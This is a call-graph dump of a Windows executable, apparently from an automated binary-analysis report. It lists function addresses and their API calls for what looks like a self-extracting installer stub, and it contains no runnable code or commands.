??3@YAXPAX 8405->8409 8407 4018cc 8406->8407 8407->8409 8411 40db53 2 API calls 8407->8411 8410 40189c 8409->8410 8412 40eca9 VariantClear 8410->8412 8413 4018f1 8411->8413 8414 4018aa ??3@YAXPAX 8412->8414 8415 4018f5 GetLastError 8413->8415 8416 401906 ??3@YAXPAX 8413->8416 8414->8358 8415->8409 8416->8400 8612 40da56 8418->8612 8422 40a738 8421->8422 8423 40a66a 8421->8423 8424 40a687 8422->8424 8425 40a73d 8422->8425 8423->8424 8426 40a704 8423->8426 8427 40a679 8423->8427 8434 40a6ad 8424->8434 8525 40a3b0 8424->8525 8428 40a6f2 8425->8428 8431 40a747 8425->8431 8433 40a699 8425->8433 8426->8434 8499 40e69c 8426->8499 8427->8428 8429 40a67e 8427->8429 8521 40ed34 8428->8521 8437 40a684 8429->8437 8446 40a6b2 8429->8446 8431->8428 8431->8446 8433->8434 8513 40ed59 8433->8513 8508 40ecae 8434->8508 8436 40a71a 8502 40eced 8436->8502 8437->8424 8437->8433 8443 40eca9 VariantClear 8444 40166b 8443->8444 8444->8358 8444->8359 8446->8434 8517 40ed79 8446->8517 8448 401340 8447->8448 8449 40112b 2 API calls 8448->8449 8450 40134b 8449->8450 8450->8367 8452 4012f7 2 API calls 8451->8452 8453 401462 8452->8453 8540 4013e2 8453->8540 8455 40146d 8455->8371 8457 4024fc 2 API calls 8456->8457 8458 403375 8457->8458 8459 40112b 2 API calls 8458->8459 8462 403385 8458->8462 8459->8462 8461 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8463 4033e8 8461->8463 8464 4033f2 8461->8464 8462->8461 8472 403477 8462->8472 8543 401986 CreateDirectoryW 8462->8543 8465 40301a 22 API calls 8463->8465 8466 401986 4 API calls 8464->8466 8469 4033f8 ??3@YAXPAX 8464->8469 8465->8464 8478 403405 8466->8478 8467 4034a7 8468 407776 55 API calls 8467->8468 8475 4034b1 ??3@YAXPAX 8468->8475 8477 4034bc 8469->8477 8470 40340a 8549 407776 8470->8549 8472->8467 8472->8469 8473 40346b ??3@YAXPAX 8473->8477 8474 40341d memcpy 8474->8478 8475->8477 8477->8388 8478->8470 8478->8473 8478->8474 8479 401986 4 API calls 8478->8479 8479->8478 8481 403037 8480->8481 8487 401804 8480->8487 8482 403048 8481->8482 8483 40303b SetLastError 8481->8483 8484 403051 8482->8484 8486 40305f FindFirstFileW 8482->8486 8482->8487 8483->8487 8568 402fed 8484->8568 8486->8484 8488 403072 FindClose CompareFileTime 8486->8488 8487->8394 8487->8395 8487->8396 8488->8484 8488->8487 8490 40ec65 8489->8490 8491 40ec86 VariantClear 8490->8491 8492 40ec9d 8490->8492 8491->8362 8492->8362 8609 40db3c 8493->8609 8497 40112b 2 API calls 8496->8497 8498 401311 8497->8498 8498->8405 8500 4012f7 2 API calls 8499->8500 8501 40e6a9 8500->8501 8501->8436 8529 40ecd7 8502->8529 8505 40ed12 8506 40a726 ??3@YAXPAX 8505->8506 8507 40ed17 _CxxThrowException 8505->8507 8506->8434 8507->8506 8532 40ec65 8508->8532 8510 40ecba 8511 40a7b2 8510->8511 8512 40ecbe memcpy 8510->8512 8511->8443 8512->8511 8514 40ed62 8513->8514 8515 40ed67 8513->8515 8516 40ecd7 VariantClear 8514->8516 8515->8434 8516->8515 8518 40ed82 8517->8518 8519 40ed87 8517->8519 8520 40ecd7 VariantClear 8518->8520 8519->8434 8520->8519 8522 40ed42 8521->8522 8523 40ed3d 8521->8523 8522->8434 8524 40ecd7 VariantClear 8523->8524 8524->8522 8526 40a3c2 8525->8526 8527 40a3de 8526->8527 8536 40eda0 8526->8536 8527->8434 8530 40eca9 VariantClear 8529->8530 8531 40ecdf SysAllocString 8530->8531 8531->8505 8531->8506 8533 40ec6d 8532->8533 8534 40ec86 VariantClear 8533->8534 8535 40ec9d 8533->8535 8534->8510 8535->8510 8537 40edae 8536->8537 8538 40eda9 8536->8538 8537->8527 8539 40ecd7 VariantClear 8538->8539 8539->8537 8541 401398 2 API calls 8540->8541 8542 4013f2 8541->8542 8542->8455 8544 4019c7 8543->8544 8545 401997 GetLastError 8543->8545 8544->8462 8546 4019b1 GetFileAttributesW 8545->8546 8548 4019a6 8545->8548 8546->8544 8546->8548 8547 4019a7 SetLastError 8547->8462 8548->8544 8548->8547 8550 401f9d 19 API calls 8549->8550 8551 40778a wvsprintfW 8550->8551 8552 407859 8551->8552 8553 4077ab GetLastError FormatMessageW 8551->8553 8556 4076a8 25 API calls 8552->8556 8554 4077d9 FormatMessageW 8553->8554 8555 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8553->8555 8554->8552 8554->8555 8560 4076a8 8555->8560 8558 407865 8556->8558 8558->8469 8561 407715 ??3@YAXPAX LocalFree 8560->8561 8562 4076b7 8560->8562 8561->8558 8563 40661a 2 API calls 8562->8563 8564 4076c6 IsWindow 8563->8564 8565 4076ef 8564->8565 8566 4076dd IsBadReadPtr 8564->8566 8567 4073d1 21 API calls 8565->8567 8566->8565 8567->8561 8574 402c86 8568->8574 8570 402ff6 8571 403017 8570->8571 8572 402ffb GetLastError 8570->8572 8571->8487 8573 403006 8572->8573 8573->8487 8575 402c93 GetFileAttributesW 8574->8575 8576 402c8f 8574->8576 8577 402ca4 8575->8577 8578 402ca9 8575->8578 8576->8570 8577->8570 8579 402cc7 8578->8579 8580 402cad SetFileAttributesW 8578->8580 8585 402b79 8579->8585 8582 402cc3 8580->8582 8583 402cba DeleteFileW 8580->8583 8582->8570 8583->8570 8586 4024fc 2 API calls 8585->8586 8587 402b90 8586->8587 8588 40254d 2 API calls 8587->8588 8589 402b9d FindFirstFileW 8588->8589 8590 402c55 SetFileAttributesW 8589->8590 8603 402bbf 8589->8603 8592 402c60 RemoveDirectoryW 8590->8592 8593 402c78 ??3@YAXPAX 8590->8593 8591 401329 2 API calls 8591->8603 8592->8593 8594 402c6d ??3@YAXPAX 8592->8594 8595 402c80 8593->8595 8594->8595 8595->8570 8597 40254d 2 API calls 8597->8603 8598 402c24 SetFileAttributesW 8598->8593 8602 402c2d DeleteFileW 8598->8602 8599 402bef lstrcmpW 8600 402c05 lstrcmpW 8599->8600 8601 402c38 FindNextFileW 8599->8601 8600->8601 8600->8603 8601->8603 8604 402c4e FindClose 8601->8604 8602->8603 8603->8591 8603->8593 8603->8597 8603->8598 8603->8599 8603->8601 8605 402b79 2 API calls 8603->8605 8606 401429 8603->8606 8604->8590 8605->8603 8607 401398 2 API calls 8606->8607 8608 401433 8607->8608 8608->8603 8610 40db1f 2 API calls 8609->8610 8611 401857 8610->8611 8611->8400 8611->8401 8617 40d985 8612->8617 8615 40da65 CreateFileW 8616 40da8a 8615->8616 8616->8352 8618 40d98f CloseHandle 8617->8618 8619 40d99a 8617->8619 8618->8619 8619->8615 8619->8616 8621 40af0c 8620->8621 8636 408ebd 8620->8636 8621->8636 8713 40ac7a 8621->8713 8623 40af3f 8624 40ac7a 7 API calls 8623->8624 8625 40b0cb 8623->8625 8629 40af96 8624->8629 8627 40e959 4 API calls 8625->8627 8626 40afbd 8720 40e959 8626->8720 8627->8636 8629->8625 8629->8626 8630 40b043 8631 40e959 4 API calls 8630->8631 8634 40b07f 8631->8634 8632 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8633 40afc6 8632->8633 8633->8630 8633->8632 8635 40e959 4 API calls 8634->8635 8635->8636 8636->8300 8637 4065ea InitializeCriticalSection 8636->8637 8637->8312 8732 4086f0 8638->8732 8681 40cdc7 8680->8681 8682 408761 4 API calls 8681->8682 8683 40cdde 8682->8683 8683->8312 8714 40e8da 3 API calls 8713->8714 8715 40ac86 8714->8715 8724 40e811 8715->8724 8717 40aca2 8717->8623 8718 409403 4 API calls 8719 40ac90 8718->8719 8719->8717 8719->8718 8721 40e93b 8720->8721 8722 40e8da 3 API calls 8721->8722 8723 40e943 ??3@YAXPAX 8722->8723 8723->8633 8725 40e8a5 8724->8725 8726 40e824 8724->8726 8725->8719 8727 40e833 _CxxThrowException 8726->8727 8728 40e863 ??2@YAPAXI 8726->8728 8729 40e895 ??3@YAXPAX 8726->8729 8727->8726 8728->8726 8730 40e879 memcpy 8728->8730 8729->8725 8730->8729 8733 40e8da 3 API calls 8732->8733 8734 4086f8 8733->8734 8735 40e8da 3 API calls 8734->8735 8736 408700 8735->8736 8737 40e8da 3 API calls 8736->8737 8738 408708 8737->8738 9102 40dace 9105 40daac 9102->9105 9108 40da8f 9105->9108 9109 40da56 2 API calls 9108->9109 9110 40daa9 9109->9110 9092 40dadc ReadFile 9111 411def __set_app_type __p__fmode __p__commode 9112 411e5e 9111->9112 9113 411e72 9112->9113 9114 411e66 __setusermatherr 9112->9114 9123 411f66 _controlfp 9113->9123 9114->9113 9116 411e77 _initterm __getmainargs _initterm 9117 411ecb GetStartupInfoA 9116->9117 9119 411eff GetModuleHandleA 9117->9119 9124 4064af _EH_prolog 9119->9124 9123->9116 9127 404faa 9124->9127 9432 401b37 GetModuleHandleW CreateWindowExW 9127->9432 9130 404fdc 9131 40648e MessageBoxA 9130->9131 9133 404ff6 9130->9133 9132 4064a5 exit _XcptFilter 9131->9132 9134 401411 2 API calls 9133->9134 9135 40502d 9134->9135 9136 401411 2 API calls 9135->9136 9137 405035 9136->9137 9435 403e23 9137->9435 9142 40254d 2 API calls 9143 405073 9142->9143 9444 402a69 9143->9444 9145 40507c 9458 403d71 9145->9458 9148 40509b _wtol 9150 4050b1 9148->9150 9463 404405 9150->9463 9151 4050d6 9152 403d71 6 API calls 9151->9152 9153 4050e1 9152->9153 9154 4050e7 9153->9154 9155 405118 9153->9155 9654 404996 9154->9654 9156 405130 GetModuleFileNameW 9155->9156 9158 40112b 2 API calls 9155->9158 9159 405151 9156->9159 9160 405142 9156->9160 9158->9156 9165 403d71 6 API calls 9159->9165 9162 407776 55 API calls 9160->9162 9161 4050ee ??3@YAXPAX 9672 403e70 9161->9672 9170 4050ec 9162->9170 9164 4050ff ??3@YAXPAX ??3@YAXPAX 9164->9132 9177 405173 9165->9177 9166 4052d5 9167 401362 2 API calls 9166->9167 9168 4052e5 9167->9168 9169 401362 2 API calls 9168->9169 9174 4052f2 9169->9174 9170->9161 9171 4051fa 9171->9170 9172 40522a 9171->9172 9176 405213 _wtol 9171->9176 9173 403d71 6 API calls 9172->9173 9182 405289 9173->9182 9175 40538d ??2@YAPAXI 9174->9175 9178 401329 2 API calls 9174->9178 9184 405399 9175->9184 9176->9172 9177->9166 9177->9170 9177->9171 9177->9172 9181 401429 2 API calls 9177->9181 9179 405327 9178->9179 9180 401329 2 API calls 9179->9180 9186 40533d 9180->9186 9181->9177 9182->9166 9183 404594 2 API calls 9182->9183 9185 4052ba 9183->9185 9187 4053cf 9184->9187 9191 407776 55 API calls 9184->9191 9185->9166 9189 401362 2 API calls 9185->9189 9190 401362 2 API calls 9186->9190 9488 4025ae 9187->9488 9189->9166 9193 405367 9190->9193 9191->9187 9195 401f9d 19 API calls 9193->9195 9194 4025ae 2 API calls 9197 4053f6 9194->9197 9196 40536e 9195->9196 9198 40254d 2 API calls 9196->9198 9199 4025ae 2 API calls 9197->9199 9200 405377 9198->9200 9201 4053fe 9199->9201 9200->9175 9491 404e3f 9201->9491 9206 40546f 9208 405534 9206->9208 9211 403d71 6 API calls 9206->9211 9207 402844 10 API calls 9209 405441 9207->9209 9210 40e8da 3 API calls 9208->9210 9209->9206 9214 407776 55 API calls 9209->9214 9212 40553c 9210->9212 9213 405493 9211->9213 9215 405573 9212->9215 9519 403093 9212->9519 9213->9208 9221 40549d 9213->9221 9216 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9214->9216 9218 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9215->9218 9219 40557c 9215->9219 9216->9206 9218->9161 9218->9170 9223 405588 wsprintfW 9219->9223 9224 4055ed 9219->9224 9230 401411 2 API calls 9219->9230 9231 401329 ??2@YAPAXI ??3@YAXPAX 9219->9231 9234 401f9d 19 API calls 9219->9234 9703 402f6c ??2@YAPAXI 9219->9703 9709 402425 ??3@YAXPAX ??3@YAXPAX 9219->9709 9221->9218 9677 404cbc 9221->9677 9222 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9225 4054f5 9222->9225 9226 401411 2 API calls 9223->9226 9553 404603 9224->9553 9225->9218 9226->9219 9229 4054cc 9229->9218 9232 407776 55 API calls 9229->9232 9230->9219 9231->9219 9233 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9232->9233 9233->9225 9234->9219 9235 40584a 9236 404603 26 API calls 9235->9236 9268 40586a 9236->9268 9240 405933 9615 404034 9240->9615 9241 4024fc 2 API calls 9241->9268 9245 4059d8 CoInitialize 9252 40243b lstrcmpW 9245->9252 9246 40595a 9249 40243b lstrcmpW 9246->9249 9247 405935 ??3@YAXPAX 9247->9240 9251 405969 9249->9251 9250 401411 ??2@YAPAXI ??3@YAXPAX 9250->9268 9253 405979 9251->9253 9255 401f9d 19 API calls 9251->9255 9254 4059fe 9252->9254 9736 403b40 9253->9736 9256 405a12 9254->9256 9259 401329 2 API calls 9254->9259 9255->9253 9621 403b59 9256->9621 9258 401362 2 API calls 9258->9268 9259->9256 9262 4055f6 9262->9235 9275 403b94 lstrlenW lstrlenW _wcsnicmp 9262->9275 9279 4057dd _wtol 9262->9279 9296 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9262->9296 9710 40484d 9262->9710 9721 40408b 9262->9721 9264 4073d1 21 API calls 9267 40599c 9264->9267 9265 401329 2 API calls 9265->9268 9266 405a4d 9270 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9266->9270 9310 405a61 9266->9310 9756 4082e9 9266->9756 9271 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9267->9271 9268->9240 9268->9241 9268->9247 9268->9250 9268->9258 9268->9265 9273 402f6c 7 API calls 9268->9273 9612 40243b 9268->9612 9735 402425 ??3@YAXPAX ??3@YAXPAX 9268->9735 9270->9266 9271->9170 9273->9268 9275->9262 9276 405910 ??3@YAXPAX 9276->9268 9277 401411 2 API calls 9277->9310 9279->9262 9280 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9302 405bf3 9280->9302 9281 405a9f GetKeyState 9281->9310 9282 405c6c 9283 405ca2 9282->9283 9284 405c74 9282->9284 9288 4012f7 2 API calls 9283->9288 9798 403f85 9284->9798 9286 401429 ??2@YAPAXI ??3@YAXPAX 9286->9310 9289 405cb0 9288->9289 9292 403b59 15 API calls 9289->9292 9297 405cb9 9292->9297 9293 407776 55 API calls 9298 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9293->9298 9294 40243b lstrcmpW 9294->9310 9295 401362 2 API calls 9299 405c91 ??3@YAXPAX 9295->9299 9296->9170 9301 405cca ??3@YAXPAX 9297->9301 9305 401362 2 API calls 9297->9305 9298->9302 9306 405cd9 9299->9306 9300 401329 ??2@YAPAXI ??3@YAXPAX 9300->9310 9301->9306 9302->9293 9303 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9302->9303 9303->9302 9304 405bcd ??3@YAXPAX 9304->9310 9305->9301 9307 405d24 9306->9307 9308 405d16 9306->9308 9811 40786b 9307->9811 9628 404a44 9308->9628 9310->9277 9310->9280 9310->9281 9310->9282 9310->9286 9310->9294 9310->9300 9310->9302 9310->9303 9310->9304 9783 407613 9310->9783 9792 407674 9310->9792 9312 405d20 9313 405d65 9312->9313 9817 403e0d 9312->9817 9314 404034 21 API calls 9313->9314 9316 405d77 9314->9316 9318 401411 2 API calls 9316->9318 9319 406373 9316->9319 9320 405d95 9318->9320 9321 4063f7 9319->9321 9324 40243b lstrcmpW 9319->9324 9364 405da8 9320->9364 9821 40453e 9320->9821 9323 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9321->9323 9329 40243b lstrcmpW 9321->9329 9326 406461 9323->9326 9327 406467 ??3@YAXPAX 9323->9327 9325 4063a4 9324->9325 9325->9321 9848 403f48 9325->9848 9326->9327 9328 403e70 4 API calls 9327->9328 9330 406478 ??3@YAXPAX ??3@YAXPAX 9328->9330 9332 406416 9329->9332 9330->9132 9331 401411 ??2@YAPAXI ??3@YAXPAX 9331->9364 9332->9323 9336 406423 9332->9336 9335 405dd8 9339 405de5 9335->9339 9340 4061fa ??3@YAXPAX ??3@YAXPAX 9335->9340 9337 4012f7 2 API calls 9336->9337 9342 406432 9337->9342 9338 4073d1 21 API calls 9343 4063e0 ??3@YAXPAX 9338->9343 9830 4043c6 9339->9830 9344 406312 9340->9344 9341 40243b lstrcmpW 9341->9364 9853 404aff 9342->9853 9343->9321 9347 40636a ??3@YAXPAX 9344->9347 9350 404034 21 API calls 9344->9350 9346 405e45 9352 401329 2 API calls 9346->9352 9347->9319 9355 406321 9350->9355 9356 405e4e 9352->9356 9353 4043c6 2 API calls 9354 405e0e 9353->9354 9357 401362 2 API calls 9354->9357 9838 4048ab 9355->9838 9361 403b7f 19 API calls 9356->9361 9362 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9357->9362 9359 40626b ??3@YAXPAX ??3@YAXPAX 9359->9344 9360 401329 2 API calls 9360->9364 9377 405e57 9361->9377 9365 406211 9362->9365 9366 405e41 9362->9366 9363 40633a SetCurrentDirectoryW 9367 4048ab 4 API calls 9363->9367 9364->9331 9364->9335 9364->9341 9364->9346 9364->9359 9364->9360 9368 401429 2 API calls 9364->9368 9371 403e0d 16 API calls 9365->9371 9366->9346 9369 406362 9367->9369 9370 405ee5 ??3@YAXPAX ??3@YAXPAX 9368->9370 9372 403e0d 16 API calls 9369->9372 9370->9364 9373 406216 9371->9373 9372->9347 9374 407776 55 API calls 9373->9374 9375 40621f 7 API calls 9374->9375 9376 40625e 9375->9376 9376->9359 9378 405f61 _wtol 9377->9378 9379 403bce lstrlenW lstrlenW _wcsnicmp 9377->9379 9380 406025 9377->9380 9378->9377 9379->9377 9381 406080 9380->9381 9382 40602e 9380->9382 9383 401362 2 API calls 9381->9383 9384 406053 9382->9384 9385 406034 9382->9385 9386 40607e 9383->9386 9388 401329 2 API calls 9384->9388 9387 401329 2 API calls 9385->9387 9389 40254d 2 API calls 9386->9389 9390 40603f 9387->9390 9391 406051 9388->9391 9392 406092 9389->9392 9393 40254d 2 API calls 9390->9393 9394 40243b lstrcmpW 9391->9394 9395 401411 2 API calls 9392->9395 9396 406048 9393->9396 9397 406068 9394->9397 9398 40609a 9395->9398 9399 40254d 2 API calls 9396->9399 9397->9392 9401 40254d 2 API calls 9397->9401 9400 401411 2 API calls 9398->9400 9399->9391 9402 4060a2 memset 9400->9402 9401->9386 9403 4060e1 9402->9403 9404 404594 2 API calls 9403->9404 9405 4060fe 9404->9405 9406 401329 2 API calls 9405->9406 9407 406109 9406->9407 9408 403b7f 19 API calls 9407->9408 9409 406112 9408->9409 9410 4061b1 9409->9410 9648 4021ed 9409->9648 9412 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9412 9414 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9414 9412->9344 9414->9340 9415 406150 9417 403b7f 19 API calls 9415->9417 9416 401429 2 API calls 9418 406147 9416->9418 9419 406168 ShellExecuteExW 9417->9419 9421 40254d 2 API calls 9418->9421 9422 406282 9419->9422 9423 40618c 9419->9423 9421->9415 9426 407776 55 API calls 9422->9426 9424 4061a0 CloseHandle 9423->9424 9425 406192 WaitForSingleObject 9423->9425 9835 402185 9424->9835 9425->9424 9428 40628c 9426->9428 9429 403e0d 16 API calls 9428->9429 9430 406291 9 API calls 9429->9430 9431 4062e1 9430->9431 9431->9412 9433 401b6c SetTimer GetMessageW DispatchMessageW KillTimer DestroyWindow 9432->9433 9434 401b9f GetVersionExW 9432->9434 9433->9434 9434->9130 9434->9131 9436 40112b 2 API calls 9435->9436 9437 403e38 GetCommandLineW 9436->9437 9438 404594 9437->9438 9439 4045ce 9438->9439 9441 4045a2 9438->9441 9440 4045c6 9439->9440 9443 401429 2 API calls 9439->9443 9440->9142 9441->9440 9442 401429 2 API calls 9441->9442 9442->9441 9443->9439 9445 401411 2 API calls 9444->9445 9453 402a79 9445->9453 9446 401362 2 API calls 9447 402b6c ??3@YAXPAX 9446->9447 9447->9145 9448 401429 ??2@YAPAXI ??3@YAXPAX 9448->9453 9449 402b5f 9449->9446 9451 401411 2 API calls 9451->9453 9453->9448 9453->9449 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9148 9460->9150 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9151 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9207 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 4025ae 2 API calls 9519->9520 9536 4030a8 9520->9536 9521 403301 9522 403344 ??3@YAXPAX 9521->9522 9523 40334e 9522->9523 9523->9215 9523->9222 9524 401411 ??2@YAPAXI ??3@YAXPAX 9524->9536 9526 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9526->9536 9527 401362 2 API calls 9528 4030f3 ??3@YAXPAX ??3@YAXPAX 9527->9528 9529 403303 9528->9529 9528->9536 9956 4029c3 9529->9956 9533 40331c ??3@YAXPAX 9533->9523 9534 4031e5 strncmp 9535 4031d0 strncmp 9534->9535 9534->9536 9535->9534 9535->9536 9536->9521 9536->9524 9536->9526 9536->9527 9536->9529 9536->9534 9537 401362 2 API calls 9536->9537 9538 402640 2 API calls 9536->9538 9541 402640 ??2@YAPAXI ??3@YAXPAX 9536->9541 9544 402f6c 7 API calls 9536->9544 9546 403330 9536->9546 9547 4032b2 lstrcmpW 9536->9547 9551 401329 2 API calls 9536->9551 9946 402986 9536->9946 9951 4023dd 9536->9951 9955 402425 ??3@YAXPAX ??3@YAXPAX 9536->9955 9539 403252 ??3@YAXPAX 9537->9539 9538->9535 9540 402a69 9 API calls 9539->9540 9542 403263 lstrcmpW 9540->9542 9541->9536 9542->9536 9544->9536 9549 402f6c 7 API calls 9546->9549 9547->9536 9548 4032c0 lstrcmpW 9547->9548 9548->9536 9550 40333c 9549->9550 9974 402425 ??3@YAXPAX ??3@YAXPAX 9550->9974 9551->9536 9554 40243b lstrcmpW 9553->9554 9555 40461c 9554->9555 9556 40466c 9555->9556 9558 401329 2 API calls 9555->9558 9557 40243b lstrcmpW 9556->9557 9559 40468a 9557->9559 9560 404633 9558->9560 9563 40243b lstrcmpW 9559->9563 9561 401f9d 19 API calls 9560->9561 9562 40463a 9561->9562 9565 40254d 2 API calls 9562->9565 9564 4046a2 9563->9564 9567 40243b lstrcmpW 9564->9567 9566 404643 9565->9566 9568 401329 2 API calls 9566->9568 9569 4046ba 9567->9569 9570 40465c 9568->9570 9572 40243b lstrcmpW 9569->9572 9571 401f9d 19 API calls 9570->9571 9573 404663 9571->9573 9574 4046d2 9572->9574 9575 40254d 2 API calls 9573->9575 9576 4046e9 9574->9576 9577 4046d9 lstrcmpiW 9574->9577 9575->9556 9578 40243b lstrcmpW 9576->9578 9577->9576 9579 4046ff 9578->9579 9580 40243b lstrcmpW 9579->9580 9581 40472c 9580->9581 9582 404739 9581->9582 9976 403d1f 9581->9976 9584 40243b lstrcmpW 9582->9584 9588 40474d 9584->9588 9585 40476d 9586 40243b lstrcmpW 9585->9586 9593 404780 9586->9593 9588->9585 9589 40243b lstrcmpW 9588->9589 9980 403cc6 9588->9980 9589->9588 9590 4047a0 9592 40243b lstrcmpW 9590->9592 9594 4047ac 9592->9594 9593->9590 9595 40243b lstrcmpW 9593->9595 9984 403cf7 9593->9984 9596 40243b lstrcmpW 9594->9596 9595->9593 9597 4047bd 9596->9597 9598 40243b lstrcmpW 9597->9598 9599 4047ce 9598->9599 9600 4047e4 9599->9600 9601 4047db _wtol 9599->9601 9602 40243b lstrcmpW 9600->9602 9601->9600 9603 4047f0 9602->9603 9604 404800 9603->9604 9605 4047f7 _wtol 9603->9605 9606 40243b lstrcmpW 9604->9606 9605->9604 9607 40480c 9606->9607 9608 40243b lstrcmpW 9607->9608 9609 404824 9608->9609 9610 40243b lstrcmpW 9609->9610 9611 40483c 9610->9611 9611->9262 9613 4023dd lstrcmpW 9612->9613 9614 40244c 9613->9614 9614->9268 9616 404045 9615->9616 9617 404088 9615->9617 9618 4012f7 2 API calls 9616->9618 9619 403b7f 19 API calls 9616->9619 9617->9245 9617->9246 9618->9616 9620 404062 SetEnvironmentVariableW ??3@YAXPAX 9619->9620 9620->9616 9620->9617 9622 40393b 7 API calls 9621->9622 9623 403b69 9622->9623 9624 4039f6 7 API calls 9623->9624 9625 403b74 9624->9625 9626 4027c7 6 API calls 9625->9626 9627 403b7a 9626->9627 9627->9266 9739 4083b6 9627->9739 9992 408676 9628->9992 9630 404a55 ??2@YAPAXI 9631 404a64 9630->9631 9645 40dcfb 3 API calls 9631->9645 9632 404a85 9994 40a7de _EH_prolog 9632->9994 10010 40b2fc 9632->10010 9633 404a95 9634 404ab3 9633->9634 9635 404a99 9633->9635 9637 404ada ??2@YAPAXI 9634->9637 9641 403354 86 API calls 9634->9641 9636 407776 55 API calls 9635->9636 9640 404aa1 9636->9640 9638 404ae6 9637->9638 9639 404aed 9637->9639 10035 404292 9638->10035 10016 40150b 9639->10016 9640->9312 9643 404ac6 9641->9643 9643->9637 9643->9640 9645->9632 9649 402200 LoadLibraryA GetProcAddress 9648->9649 9650 4021fb 9648->9650 9651 40221b 9649->9651 9652 402223 9649->9652 9650->9410 9650->9415 9650->9416 9651->9650 9652->9651 10498 4021b9 LoadLibraryA GetProcAddress 9652->10498 9655 40661a 2 API calls 9654->9655 9656 4049af 9655->9656 9657 401f9d 19 API calls 9656->9657 9658 4049bd 9657->9658 9659 4024fc 2 API calls 9658->9659 9660 4049c7 9659->9660 9661 4049fd 9660->9661 9663 40254d ??2@YAPAXI ??3@YAXPAX 9660->9663 9662 40254d 2 API calls 9661->9662 9664 404a0a 9662->9664 9663->9660 9665 401f9d 19 API calls 9664->9665 9666 404a11 9665->9666 9667 40254d 2 API calls 9666->9667 9668 404a1b 9667->9668 9669 4073d1 21 API calls 9668->9669 9670 404a30 ??3@YAXPAX 9669->9670 9671 404a41 9670->9671 9671->9170 9673 40e8da 3 API calls 9672->9673 9674 403e7e 9673->9674 9675 40e8da 3 API calls 9674->9675 9676 40e943 ??3@YAXPAX 9675->9676 9676->9164 9678 40db53 2 API calls 9677->9678 9679 404ce8 9678->9679 9680 404d44 9679->9680 9682 4024fc 2 API calls 9679->9682 9681 4025ae 2 API calls 9680->9681 9683 404d4c 9681->9683 9684 404cf7 9682->9684 9685 403e86 2 API calls 9683->9685 9688 404db5 ??3@YAXPAX 9684->9688 9690 403354 86 API calls 9684->9690 9686 404d59 9685->9686 9687 403ef6 2 API calls 9686->9687 9689 404d66 9687->9689 9702 404db1 9688->9702 9691 403ef6 2 API calls 9689->9691 9692 404d1b 9690->9692 9693 404d73 9691->9693 9692->9688 9695 40db53 2 API calls 9692->9695 9694 403ef6 2 API calls 9693->9694 9696 404d80 9694->9696 9697 404d37 9695->9697 9698 40dd5f 2 API calls 9696->9698 9697->9688 9699 404d3b ??3@YAXPAX 9697->9699 9700 404d94 9698->9700 9699->9680 9700->9688 9701 404d9d ??3@YAXPAX 9700->9701 9701->9702 9702->9229 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 